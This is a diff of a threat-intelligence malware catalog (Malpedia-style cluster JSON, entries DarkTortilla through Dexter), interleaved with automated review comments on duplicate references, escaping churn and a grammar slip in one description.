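Review bot: The new-side DarkSide `refs` list still carries the same page twice under different spellings: `chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/` once with `http://` and once with `https://`, and the CrowdStrike `carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/` post once with and once without its `?utm_campaign=` tracking query. These near-duplicates predate this commit, but the regeneration is the place to fix them; normalizing the scheme and stripping tracking parameters before deduplication would collapse each pair to one entry. The `zawadidone.nl` pair may be two distinct posts and should be checked rather than merged blindly.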
@@ -21038,7 +22037,7 @@ "value": "DarkTequila" }, { - "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", + "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks\u00ae Counter Threat Unit\u2122 (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. 
It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla", @@ -21055,11 +22054,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", - "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1", - "https://www.tgsoft.it/files/report/download.asp?id=7481257469", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html", - "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "https://www.facebook.com/darktrackrat/", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml" ], "synonyms": [], 
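Review bot: The only change to the DarkTortilla `description` is that ® and ™ are now written as `\u00ae` and `\u2122`; both spellings decode to the identical string, so this hunk is serializer churn rather than a content update. The escaping suggests the generator's ASCII-escape setting (Python's `ensure_ascii` or equivalent) changed between runs. Pinning that setting in the generator keeps descriptions from flipping back and forth on the next regeneration.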
@@ -21069,13 +22068,13 @@ "value": "Darktrack RAT" }, { - "description": "", + "description": "According to Enigmasoft, DarkVNC malware is a hacking tool that is available for purchase online. it is can be used as a Virtual Network Computing service, which means that the attackers can get full access to the targeted system via this malware. However, unlike a genuine Virtual Network Computing utility, the DarkVNC threat operates in the background silently. Therefore, it is highly likely that the victims may not notice that their systems have been compromised.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc", "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884", - "https://reaqta.com/2017/11/short-journey-darkvnc/", - "https://isc.sans.edu/diary/rss/28934" + "https://isc.sans.edu/diary/rss/28934", + "https://reaqta.com/2017/11/short-journey-darkvnc/" ], "synonyms": [], "type": [] @@ -21088,10 +22087,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", "https://www.secureworks.com/research/threat-profiles/bronze-butler", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ "Muirim", 
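Review bot: The newly populated DarkVNC `description` contains a grammatical slip, `it is can be used as a Virtual Network Computing service`, which should read `it can be used`. The text opens with "According to Enigmasoft" but no Enigmasoft page appears in the entry's `refs`, so the attribution cannot be followed from the cluster itself. If the text is imported verbatim from the upstream source, both points are better corrected there so the next regeneration does not reintroduce them.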
@@ -21122,15 +22121,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", "https://www.macnica.net/mpressioncss/feature_05.html/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/" ], "synonyms": [], "type": [] 
@@ -21143,17 +22142,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin", - "https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis", "https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292", - "https://twitter.com/M_haggis/status/1498399791276912640", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis", + "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage", + "https://twitter.com/M_haggis/status/1498399791276912640", "https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/", "https://teamt5.org/tw/posts/backdoor-of-driver-analysis-Daxin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis", - "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6" + "https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/" + ], + "synonyms": [ + "DELIMEAT" ], - "synonyms": [], "type": [] }, "uuid": "63bf3200-5e7b-4e29-ba1c-6bf834c15459", 
@@ -21164,12 +22166,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", - "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", - "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", + "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/", "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", - "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", + "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", + "https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/", + "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/", - "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/" + "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands" ], "synonyms": [ "ModiLoader", 
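Review bot: The added line `"https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader",` duplicates the unchanged first element of the DBatLoader `refs` array, so the new side lists the same URL twice. The extra copy should be dropped, and the generator should deduplicate refs before serialization so an upstream entry that repeats a URL cannot propagate the duplicate into the cluster.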
@@ -21211,30 +22216,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat", - "https://embee-research.ghost.io/dcrat-manual-de-obfuscation/", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", "https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/", - "https://cert.gov.ua/article/160530", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://community.riskiq.com/article/50c77491", - "https://www.youtube.com/watch?v=ElqmQDySy48", - "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time", + "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html", + "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", + "https://cert.gov.ua/article/405538", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://community.riskiq.com/article/50c77491", + "https://embee-research.ghost.io/dcrat-manual-de-obfuscation/", + "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", + "https://cert.gov.ua/article/160530", + "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + 
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", "https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and", "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html", "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html", - "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://cert.gov.ua/article/405538", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + 
"https://www.youtube.com/watch?v=ElqmQDySy48", + "https://muha2xmad.github.io/malware-analysis/dcrat/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "DarkCrystal RAT" @@ -21277,11 +22284,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", - "https://unit42.paloaltonetworks.com/atoms/rancortaurus/" + "https://unit42.paloaltonetworks.com/atoms/rancortaurus/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html" ], "synonyms": [], "type": [] @@ -21296,8 +22303,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/", - "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf" ], "synonyms": [ "Agrius", 
@@ -21314,9 +22321,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply", + "https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/", "https://securelist.com/threat-in-your-browser-extensions/107181", - "https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/", - "https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/" + "https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/" ], "synonyms": [], "type": [] 
@@ -21325,19 +22332,19 @@ "value": "DealPly" }, { - "description": "", + "description": "According to PCrisk, DearCry ransomware has been observed infecting systems via ProxyLogon vulnerabilities of Microsoft Exchange servers - mail and calendaring servers developed by Microsoft. While a patch has been released addressing these vulnerabilities, thousands of Microsoft Exchange servers remained unpatched at the time of research.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf", + "https://www.youtube.com/watch?v=qmCjtigVVR0", + "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s", "https://www.youtube.com/watch?v=Hhx9Q2i7zGo", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s", - "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/", - "https://www.youtube.com/watch?v=qmCjtigVVR0", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://www.youtube.com/watch?v=MRTdGUy1lfw", - "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf" + "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/" ], "synonyms": [ "DoejoCrypt" 
@@ -21353,12 +22360,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom", "https://twitter.com/Amigo_A_/status/1196898012645220354", - "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html", - "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html", - "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html", - "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md", "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html", - "https://asec.ahnlab.com/1269" + "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html", + "https://asec.ahnlab.com/1269", + "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md", + "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html", + "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html" ], "synonyms": [ "deathransom", @@ -21401,8 +22408,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deepcreep", - "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/", - "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/" + "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/" ], "synonyms": [], "type": [] 
@@ -21428,19 +22435,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/", - "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", - "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/", "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html", - "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf" + "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + 
"https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals" ], "synonyms": [ "Glushkov" @@ -21477,6 +22484,23 @@ "uuid": "1f1a894f-7a1b-4b98-9280-d33cf884a539", "value": "DeimosC2" }, + { + "description": "According to CERT-UA, this malware makes use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking. Its specificity is the presence of a server part, which is usually installed on compromised MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool), effectively turning a legitimate server into a malware control center.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.delivery_check", + "https://cert.gov.ua/article/5213167", + "https://twitter.com/msftsecintel/status/1681695399084539908" + ], + "synonyms": [ + "CAPIBAR", + "GAMEDAY" + ], + "type": [] + }, + "uuid": "73ef709e-c88d-4737-a3fb-81d7ece5c97d", + "value": "DeliveryCheck" + }, { "description": "", "meta": { @@ -21489,6 +22513,19 @@ "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", "value": "Delta(Alfa,Bravo, ...)" }, + { + "description": "Rust-based infostealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer", + "https://www.trendmicro.com/en_us/research/23/e/rust-based-info-stealers-abuse-github-codespaces.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3b38cd03-a387-43ce-b8d9-c337d51a84d0", + "value": "DeltaStealer" + }, { "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { 
@@ -21502,7 +22539,7 @@ "value": "Dented" }, { - "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", + "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon", 
@@ -21519,9 +22556,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", - "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone" ], "synonyms": [], "type": [] 
@@ -21556,27 +22593,27 @@ "value": "DeroHE" }, { - "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", + "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", - "https://attack.mitre.org/groups/G0096", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", - "https://attack.mitre.org/groups/G0001/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", - "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/", - 
"https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", - "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", + "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", + "https://attack.mitre.org/groups/G0096", "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family", - "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf" + "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", + "https://attack.mitre.org/groups/G0001/", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + 
"https://www.secureworks.com/research/threat-profiles/bronze-keystone" ], "synonyms": [ "PHOTO" @@ -21591,9 +22628,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk" + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf" ], "synonyms": [], "type": [] @@ -21659,11 +22696,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", - "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", - "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" ], "synonyms": [ "LusyPOS" 
